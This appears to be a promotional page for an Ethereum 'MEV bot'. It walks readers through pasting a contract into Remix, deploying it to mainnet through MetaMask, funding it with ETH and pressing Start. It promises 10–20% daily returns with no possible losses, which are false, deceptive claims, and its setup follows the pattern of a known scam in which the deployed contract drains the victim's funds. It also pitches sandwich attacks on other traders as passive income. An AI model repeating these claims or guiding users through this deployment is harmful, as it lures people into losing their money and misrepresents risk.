Anatomy of MEV Bots
Arbitrages in the Wild:
1- Arbitrageur begins with 1,000 Wrapped Ether (WETH), and ends up with 1,045
2- List of interesting mev bots transactions;
Why You Need MEV Bot?
MEV Bot is a smart contract that uses arbitrage and sandwich attack strategies to make trades on behalf of its users. By continuously scanning different exchanges for price differences, MEV Bot is able to identify opportunities for arbitrage and execute trades automatically, allowing users to earn profits without having to manually monitor the markets.
Overall, MEV Bot is an innovative tool that can help users make money by taking advantage of price differences in the markets. Its ability to execute arbitrage and sandwich attack trades automatically makes it an attractive option for those looking to earn passive income from their investments.
And i am 0xGeorge a #MEV enthusiast that has recently deployed a Arbitrage and Sandwich bot on Ethereum Mainnet. I've released source code for free, but there is a 0.5% fee deducted from every successful trade executed by the user's bot. This fee goes to me and is used to cover expenses.
How to launch your own Sandwich bot: (Check the video too for better understanding)
Deployment video
1. Download MetaMask (if you don’t have it already):
2. Access Remix:
3. Head over to the Sidebar, Click on the “contracts” folder and then create “New File”. Rename it as “Sandwich.sol”
5. Go to the “Solidity Compiler” tab.
Select version “0.6.6” and then press “Compile Sandwich.sol”.
6. Go to the “Deploy & Run Transactions” tab and on Environment select the “Injected Provider - Metamask”
6.1. 6.2.
6.3 It will appear a Metamask popup to connect your wallet, connect the wallet you want to deploy the bot.
Make sure you are on Ethereum Mainnet.
6.4 Press Deploy button.
By approving the Metamask contract creation fee, you will have created your own contract.
Your Contract will appear below, just press the > to open it.
7. Copy your newly created contract address and fund it with any amount of ETH that you would like the bot to earn with by simply sending ETH to your newly created contract address.
Head over to your Metamask and fund your newly created contract.
After your transaction is confirmed your balance should appear like this on your contract.
8. Click the “Start” button to run the bot.
The bot will start working immediately earning you profits from trades.
Stop bot by clicking on stop button.
Withdraw your ETH at any time by clicking the “Withdraw” button.
What average ROI can I expect?
According to our latest data of MEV bot performances (past 7 weeks) ROI is about +10–20% daily per user. Bot does not make any losses, it only executes trades when there’s proper arbitrage opportunity to make profit, so under all circumstances user is always on plus.
What amount of funds bot need to work?
We recommend funding the contract with at least 1 ETH but a minimum of 0.5 ETH could be required to cover gas fees and possible burn fees.